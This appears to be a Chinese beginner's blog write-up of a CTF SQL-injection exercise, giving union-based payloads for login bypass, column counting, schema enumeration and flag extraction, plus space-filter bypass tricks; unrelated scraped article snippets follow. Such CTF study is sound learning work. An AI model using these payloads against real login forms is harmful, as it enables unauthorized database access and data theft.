WEEK1 SQL注入小練

2021-10-08 12:01:14 字數 1276 閱讀 8191

第一周學習web,不知道學習筆記寫什麼寫點做題筆記吧。

進來先判斷,這道題考的應該是sql注入,所以先試試用 or 繞過登入邏輯看看成不成功(其實我也只會這一點點)

1' or1=

1;#

其實這裡的;是可以不需要的但我還是打上了。

發現登陸成功了,並且有回顯,所以我們要利用回顯的點去進行注入。

首先是判斷union後應該接幾個查詢。

1' or1=

1union1,

2;#//這個發現它沒有登陸成功,所以接著試三個。

1' or1=

1union1,

2,3;

#//發現登陸成功,並且回顯的點是2。

接著開始用2的位置爆庫名

1' or1=

1union1,

database()

,3;#//發現資料庫名為web2。

接下來爆表。

1' or1=

1union

select

1,group_concat(table_name),3

from information_schema.

tables

where table_schema=「web2」;

#//爆出表名為flag,user。

接著是字段。

1' or1=

1union

select

1,group_concat(column_name),3

from information_schema.

columns

where table_name=「flag」;

#//得到欄位名是flag。

最後是爆值。

1' or1=

1union

select

1,flag,

3from flag;

#

到此,爆出flag。

這也是一道sql注入題和上題不同的是在輸入

1' or1=

1;#

時,會顯示mysql inject error。於是開始乙個乙個排查,發現是過濾了空格。

於是空格有一下幾種代替方式。

/**/,(),teb,兩個空格,`
其他的流程與題二無異。

sql注入除mysql之外 SQL注入的練習

測試sql注入的字元型別 若輸入1時的結果 輸入1 and 1 1時,結果 輸入1 and 1 2時,結果 則為字元型,可對其進行sql注入 確定字元型後,可以對mysql資料庫中的某些資料進行查詢,甚至在許可權較高時可以修改資料庫的內容,以下為讀取資料庫名稱的注入 1 union select 1...

SQL注入1

1 整型引數的判斷 當輸入的引數yy為整型時,通常abc.asp中sql語句原貌大致如下 select from 表名 where 字段 yy,所以可以用以下步驟測試sql注入是否存在。附加乙個單引號 此時abc.asp中的sql語句變成了 select from 表名 where 字段 yy ab...

SQL注入詳解 1

隨著b s 模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫 的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫查詢 根據程式返回的結果,獲得...